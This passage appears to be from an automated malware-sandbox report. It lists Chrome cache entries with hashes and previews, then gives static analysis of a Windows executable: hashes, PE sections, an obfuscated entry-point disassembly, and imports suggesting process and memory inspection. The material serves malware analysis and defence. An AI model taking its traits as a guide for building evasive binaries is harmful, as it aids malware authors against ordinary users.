                                                                                                                                                                                                                                                                                          SHA-512:F94483D04F9B99387614B8324173F8F2DAA3CC8DFC407B47FAB68880D9EA311476081BD363608945D0562C8487F35B9427F2454EB6616759878CE7A915DFF496
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["2025 nfl draft picks","ripple xrp price","mass unfollowing vexbolts","nvidia geforce rtx 5090","winter storm warning","kessler syndrome space","ipswich town vs chelsea fc prediction","saving too much for retirement"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-4493194997063967426,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 516

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):117446
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                          MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                          SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                          SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                          SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 517

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 518

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):132739
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436632409392766
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fekJQ7O4N5dTm+syHEt4W3XdQ4Q6AuSr/nUW2i6o:f/Q7HTt/sHdQ4Q6ADfUW8o
                                                                                                                                                                                                                                                                                          MD5:529E8F25E0BC824619520531024E7EFE
                                                                                                                                                                                                                                                                                          SHA1:7F908E3844599D909B9A3774528328EB7F0B2109
                                                                                                                                                                                                                                                                                          SHA-256:3CF2EF88DCFD7B81A823F5437692894EB393A98F953C553B012740E0ED010FA5
                                                                                                                                                                                                                                                                                          SHA-512:A474E968E7608BCF01A33F339CFFC5E0E99BFD1E3959537F89AE7699F9A56400076467498E46F1D930198EB23CC5C94FA56012486EF25C42D0BFB76BCE03FAB7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 519

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):175897
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                                          MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                                          SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                                          SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                                          SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 520

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 521

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.2673116258238615
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                          File name:BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File size:369'152 bytes
                                                                                                                                                                                                                                                                                          MD5:ed0fdaf80191fad95aa5c2a7882064e2
                                                                                                                                                                                                                                                                                          SHA1:debe6e60480b524022308a7a0c66e0424f91dade
                                                                                                                                                                                                                                                                                          SHA256:72a37e2a65b502af4a3fabf99f069bdb51a50cebb764fb6eb4a1920320dd849c
                                                                                                                                                                                                                                                                                          SHA512:d6591aaef2bc2b4194b87099a25224d91ee9173fc9f34fd091b6b8e82abb2b47b823051b8eb012acf82bd316a5f718f73448e269576a742bb8da060bb563663a
                                                                                                                                                                                                                                                                                          SSDEEP:6144:M1QQpcQezFhBj9Xrase0l9RstdAidtdB8njOuOHY/Yp6kfDEVTu7c78RQdISBJuc:M1QY4d9RstfB8njCY/d2EJ786fs9exHV
                                                                                                                                                                                                                                                                                          TLSH:86746B227E51C8B5C19529BF18CDAB6C1F6F8D877FC096D3A1886CAE5D617CB84B1302
                                                                                                                                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S.pg..........................................@..................................................................U..W....U..T..

                                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Entrypoint:0x42d98b
                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                          Time Stamp:0x6770A553 [Sun Dec 29 01:26:43 2024 UTC]
                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                          Import Hash:9fa03dc67d87598889edf28a24bc9b26

                                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          sub esp, 00000408h
                                                                                                                                                                                                                                                                                          mov eax, 00000100h
                                                                                                                                                                                                                                                                                          lea ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                          mov dword ptr [ecx], eax
                                                                                                                                                                                                                                                                                          mov dword ptr [esp], eax
                                                                                                                                                                                                                                                                                          mov edi, 5EE89D4Dh
                                                                                                                                                                                                                                                                                          mov eax, dword ptr [0044FEB0h]
                                                                                                                                                                                                                                                                                          add eax, edi
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                                                                                          call eax
                                                                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                                          sete cl
                                                                                                                                                                                                                                                                                          mov eax, dword ptr [00450D64h]
                                                                                                                                                                                                                                                                                          mov ebx, 0189D4DAh
                                                                                                                                                                                                                                                                                          mov eax, dword ptr [eax+ecx*4+3A181B56h]
                                                                                                                                                                                                                                                                                          add eax, ebx
                                                                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                                                                          jmp eax
                                                                                                                                                                                                                                                                                          add edi, dword ptr [0044FEB4h]
                                                                                                                                                                                                                                                                                          mov eax, esp
                                                                                                                                                                                                                                                                                          lea ecx, dword ptr [esp+00000208h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                                                                                          call edi
                                                                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                                                          setne cl
                                                                                                                                                                                                                                                                                          shl ecx, 05h
                                                                                                                                                                                                                                                                                          mov eax, dword ptr [00450D64h]
                                                                                                                                                                                                                                                                                          add ebx, dword ptr [eax+ecx+3A181B3Eh]
                                                                                                                                                                                                                                                                                          jmp ebx
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [eax+40h]
                                                                                                                                                                                                                                                                                          lea ecx, dword ptr [eax+0Ch]
                                                                                                                                                                                                                                                                                          cmp dword ptr [esp+04h], 08h
                                                                                                                                                                                                                                                                                          cmove edx, ecx
                                                                                                                                                                                                                                                                                          mov ecx, 0189D4DAh
                                                                                                                                                                                                                                                                                          mov edx, dword ptr [edx+3A181B2Ah]
                                                                                                                                                                                                                                                                                          add edx, ecx
                                                                                                                                                                                                                                                                                          jmp edx
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                                                                                          cmp dword ptr [esp], 07h
                                                                                                                                                                                                                                                                                          cmove edx, eax
                                                                                                                                                                                                                                                                                          add ecx, dword ptr [edx+3A181B2Ah]
                                                                                                                                                                                                                                                                                          jmp ecx
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [eax+20h]
                                                                                                                                                                                                                                                                                          lea ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                          cmp word ptr [esp+08h], 004Ah
                                                                                                                                                                                                                                                                                          cmove edx, ecx
                                                                                                                                                                                                                                                                                          mov ecx, 0189D4DAh
                                                                                                                                                                                                                                                                                          mov edx, dword ptr [edx+3A181B2Ah]
                                                                                                                                                                                                                                                                                          add edx, ecx
                                                                                                                                                                                                                                                                                          jmp edx
                                                                                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                                                                                          cmp word ptr [esp+00h], 0000h

                                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x455a80x57.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x455ff0x154.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x1a8.rsrc
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x570000x8ffc.reloc
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x452080x5c.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x45a7c0x328.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                          .text0x10000x398ec0x39a0073c97fe5ea8031503d0108ec31c26eafFalse0.4176001559110629data6.80330329226556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .rdata0x3b0000xbb5c0xbc008bb9e9e61a94eb92c086c965e81a0764False0.9054396609042553data7.753480993487329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .data0x470000xd3880xb400a116c7a901e5d696a00d49b35e885f8dFalse0.6409288194444445data7.266736298808888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .00cfg0x550000x40x200b76948572bbbec61b2bc1f3b63652fb9False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .rsrc0x560000x1a80x200774df459a9b2deb9f2aeaee4ba6410abFalse0.482421875data4.179663701400347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .reloc0x570000x8ffc0x9000d5f45390d991c66cb363496ccdc0ca1aFalse0.4982367621527778data6.635239983168195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                          RT_MANIFEST0x560600x143XML 1.0 document, ASCII textEnglishUnited States0.628482972136223

                                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                          KERNEL32.dllCloseHandle, CopyFileA, CreateDirectoryA, CreateEventA, CreateFileA, CreateFileMappingA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetDriveTypeA, GetEnvironmentVariableA, GetFileAttributesA, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetLastError, GetLocalTime, GetLocaleInfoA, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetSystemInfo, GetSystemPowerStatus, GetSystemTime, GetTickCount, GetTimeZoneInformation, GetUserDefaultLocaleName, GetVolumeInformationA, GetWindowsDirectoryA, GlobalAlloc, GlobalFree, GlobalLock, GlobalMemoryStatusEx, GlobalSize, HeapAlloc, HeapFree, InitializeCriticalSectionEx, IsWow64Process, K32EnumProcessModules, K32GetModuleBaseNameA, K32GetModuleFileNameExA, LoadLibraryW, LocalAlloc, LocalFree, MapViewOfFile, OpenEventA, OpenProcess, Process32First, Process32Next, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, TerminateProcess, UnmapViewOfFile, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcpyA, lstrcpynA, lstrlenA
